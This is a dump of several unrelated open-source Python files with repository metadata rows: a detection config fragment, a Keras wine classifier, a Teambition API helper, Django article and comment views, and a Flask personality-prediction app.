work_dir = './work_dirs/bbox_r50_grid_center_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"[email protected]"
] | |
f1c755702c61d3a4c3f5e88391da6a3096250b2f
|
5399dd4580ea3f528753bc8b52a981743d62f8bb
|
/keras/keras36_hist3_wine.py
|
6844fef8e2c4a5ad39b62167985de24abdf45314
|
[] |
no_license
|
iwillbeaprogramer/Study
|
3ac7c118ffe3981d78b4ad263cb62432eae13970
|
3bfe571da5bbfc545b994e5878e217f9306bde14
|
refs/heads/main
| 2023-05-07T16:31:05.564973 | 2021-05-27T14:50:00 | 2021-05-27T14:50:00 | 324,044,441 | 8 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,733 |
py
|
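# Trains a small fully-connected network on the sklearn wine dataset (one-hot targets,
# min-max scaling) and plots the training/validation loss and accuracy history.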
from sklearn.datasets import load_wine
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler,OneHotEncoder
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.callbacks import EarlyStopping
import matplotlib.pyplot as plt
early_stopping = EarlyStopping(monitor='loss',patience=10)
datasets = load_wine()
x = datasets.data
y = datasets.target
encoder = OneHotEncoder()
y = encoder.fit_transform(y.reshape(-1,1)).toarray()
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2)
x_train,x_val,y_train,y_val = train_test_split(x_train,y_train,test_size=0.2)
scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
x_test = scaler.transform(x_test)  # transform only: the scaler is fit on the training set alone
x_val = scaler.transform(x_val)
model = Sequential()
model.add(Dense(128,activation='relu',input_dim=13))
model.add(Dense(64,activation='relu'))
model.add(Dense(32,activation='relu'))
model.add(Dense(16,activation='relu'))
model.add(Dense(8,activation='relu'))
model.add(Dense(3,activation='softmax'))
model.compile(loss = 'categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
hist = model.fit(x_train,y_train,validation_data=(x_val,y_val),epochs=300,batch_size=4)
loss = model.evaluate(x_test,y_test,batch_size=4)
y_pred = model.predict(x_test)
print('loss : ',loss[0],'\naccuracy : ',loss[1])
'''
DNN
loss : 3.391478821868077e-05
accuracy : 1.0
'''
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.plot(hist.history['accuracy'])
plt.plot(hist.history['val_accuracy'])
plt.title('loss & acc')
plt.ylabel('loss, acc')
plt.xlabel('epochs')
plt.legend(['train_loss','val_loss','train_acc','val_acc'])
plt.show()
|
[
"[email protected]"
] | |
ae1a109105467ef139d1001e81abe371486a106d
|
15e0928f1fad3c4a21823bdce4bc4e76d3d2801a
|
/teambitionHelp.py
|
1fe4180389083c096e89e89d77983d59e77ec661
|
[] |
no_license
|
HuangJT/teambitionApi
|
a610b70ffa1492804f9b63afe57c844ceb7ece70
|
12494bba65246f1e548792bc3a02b87e05f59a81
|
refs/heads/master
| 2022-07-05T21:59:55.998780 | 2020-05-11T02:43:58 | 2020-05-11T02:43:58 | 262,920,368 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,090 |
py
|
# -*- coding: UTF-8 -*-
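# Helper for the Teambition open API: signs requests with an app-scoped JWT (HS256)
# and wraps a few organization/task endpoints defined in settings.SETTINGS.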
import requests
import json
import pymysql
from pymysql import cursors
import time
import urllib
import codecs
from datetime import datetime, date, timedelta
# pip install PyJWT
import jwt
import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
from settings import SETTINGS
class TeambitionHelp:
__tbAppId = "" # api token
__tbSecrect = ""
__accessToken = ""
def __init__(self):
self.__tbAppId = SETTINGS["TB_APP_ID"]
self.__tbSecrect = SETTINGS["TB_APP_SECRECT"]
        expire_time = int(time.time() + 3600)  # token expires after 1 hour
encoded = jwt.encode({'_appId': self.__tbAppId, 'exp': expire_time}, self.__tbSecrect, algorithm='HS256')
# print(encoded)
encoded_str = str(encoded, encoding='utf-8')
# print(encoded_str)
self.__accessToken = encoded_str
def __getAuthHeaders(self):
return {'Authorization': 'Bearer '+ self.__accessToken,'X-Tenant-Id':SETTINGS['TB_ORG_ID'],'X-Tenant-Type':'organization'}
def logf(self,content):
logContent = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + " " + content + "\n"
logFile = codecs.open(SETTINGS['LOG_FILE'], 'a', encoding='utf-8')
logFile.write(logContent)
print(logContent)
logFile.close()
def getOrgInfo(self):
res = requests.get(SETTINGS["URL_TB_GET_ORG_INFO"] + "?orgId="+ SETTINGS["TB_ORG_ID"],headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
# resJson = json.loads(res.content.decode("utf-8"))
def getTaskGroup(self,groupId):
res = requests.get(SETTINGS["URL_TB_GET_TASK_GROUP"] + "?projectId="+ groupId,headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def getTaskList(self,taskListId):
res = requests.get(SETTINGS["URL_TB_GET_TASK_LIST"] + "?tasklistId="+ taskListId,headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def getTasksByTql(self,tql):
res = requests.post(SETTINGS["URL_TB_GET_TASK_TQL"] ,json={"tql":tql},headers=self.__getAuthHeaders())
print(res.content.decode("utf-8"))
resJson = json.loads(res.content.decode("utf-8"))
return resJson.get("result")
def main():
teambitionHelp = TeambitionHelp()
# groupList = teambitionHelp.getTaskGroup(SETTINGS["TB_PROJECT_ID_DEVELOP"])
# for group in groupList:
# print(group.get("name"))
# # print(group.get("tasklistIds"))
# for taskListId in group.get("tasklistIds"):
# print(teambitionHelp.getTaskList(taskListId))
tasks = teambitionHelp.getTasksByTql("projectId=" + SETTINGS["TB_PROJECT_ID_DEVELOP"] + " AND id = 5e78xxxxxxx7880 " )
for task in tasks:
print(task)
print("\n")
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
84340a119e8fdb72320174077f9aa1c0605ca64f
|
9d566e153a254390ed758f4e945781899b6dcd07
|
/03_django/02_django_crud/articles/views.py
|
e9c78e872870c579df912051bc9513f1f01afb88
|
[] |
no_license
|
baambox5/TIL
|
6f1b0fdc342ed29b85a68404b916fc6f4cace7bf
|
0419779ccbf506a1e89d581b98658dd07b78388c
|
refs/heads/master
| 2023-01-13T01:14:08.125234 | 2020-01-17T14:36:34 | 2020-01-17T14:36:34 | 195,918,108 | 0 | 0 | null | 2023-01-07T11:27:08 | 2019-07-09T02:31:02 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,964 |
py
|
from IPython import embed
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from .models import Article, Comment
# Create your views here.
def index(request):
# articles = Article.objects.all()
articles = Article.objects.order_by('-pk') # DB가 변경(가능한 권장)
# articles = Article.objects.all()[::-1] # python이 변경
context = {'articles': articles,}
return render(request, 'articles/index.html', context)
def create(request):
# CREATE
if request.method == 'POST':
title = request.POST.get('title')
content = request.POST.get('content')
image = request.FILES.get('image')
# 1
# article = Article()
# article.title = title
# article.content = content
# article.save()
# 2
article = Article(title=title, content=content, image=image)
article.save()
# 3
# Article.objects.create(title=title, content=content)
        return redirect(article) # main page
# return redirect('/articles/', article.pk)
# NEW
else:
return render(request, 'articles/create.html')
def detail(request, article_pk):
article = Article.objects.get(pk=article_pk)
comments = article.comment_set.all()
context = {'article': article, 'comments': comments,}
return render(request, 'articles/detail.html', context)
def delete(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.delete()
return redirect('articles:index')
else:
return redirect(article)
def update(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.title = request.POST.get('title')
article.content = request.POST.get('content')
article.image = request.FILES.get('image')
article.save()
return redirect(article)
else:
context = {'article': article,}
return render(request, 'articles/update.html', context)
def comments_create(request, article_pk):
    # the article this comment will be attached to
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
        # comment content submitted from the form
content = request.POST.get('content')
        # create and save the comment
comment = Comment(article=article, content=content)
comment.save()
return redirect(article)
# return redirect('articles:detail', article.pk)
# return redirect('articles:detail' article_pk)
else:
return redirect(article)
def comments_delete(request, article_pk, comment_pk):
# article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
comment = Comment.objects.get(pk=comment_pk)
comment.delete()
# return redirect(article)
return redirect('articles:detail', article_pk)
|
[
"[email protected]"
] | |
1a978bc0c5339f155784d67e949cf1b613a17034
|
112b6fbda45328775cde667d084f7c4a2c5898bf
|
/app.py
|
9a3521caf6c87e0927ff12566f8c63d9f210161a
|
[] |
no_license
|
jenienam/Online-Personality-App
|
5a93fe37075198bf73cdb70f45dac43ed97a8125
|
1d913f4d9e6bc00beb358153b3f91234cd0176da
|
refs/heads/master
| 2022-12-16T05:27:19.138811 | 2020-09-17T07:17:11 | 2020-09-17T07:17:11 | 287,020,047 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,432 |
py
|
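# Flask app: scrapes a user's Reddit or Twitter posts, scores the text, and predicts a
# personality type shown on the result page.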
# Dependencies
import numpy as np
from flask import Flask, request, render_template
import requests
from web_scraper import redditScraper, twitterScraper
from data_cleaning import calculateModelParameters
from model import personalityTypeResult
app = Flask(__name__)
@app.route('/')
def home():
return (render_template('index.html'))
@app.route('/reddit',methods = ['POST', 'GET'])
def predict_reddit():
if request.method == 'POST':
username = request.form['reddit-username']
comments = redditScraper(username)
scores = calculateModelParameters(comments)
personality = personalityTypeResult(comments)
return (render_template('result.html', username=username, comments=comments, scores=scores, personality=personality))
@app.route('/twitter',methods = ['POST', 'GET'])
def predict_twitter():
if request.method == 'POST':
username = request.form['twitter-username']
comments = twitterScraper(username)
scores = calculateModelParameters(comments)
personality = personalityTypeResult(comments)
return (render_template('result.html', username=username, comments=comments, scores=scores, personality=personality))
@app.route('/data')
def data():
return (render_template('data.html'))
@app.route('/about')
def about():
return (render_template('about.html'))
if __name__ == "__main__":
app.run(debug=True)
|
[
"[email protected]"
] |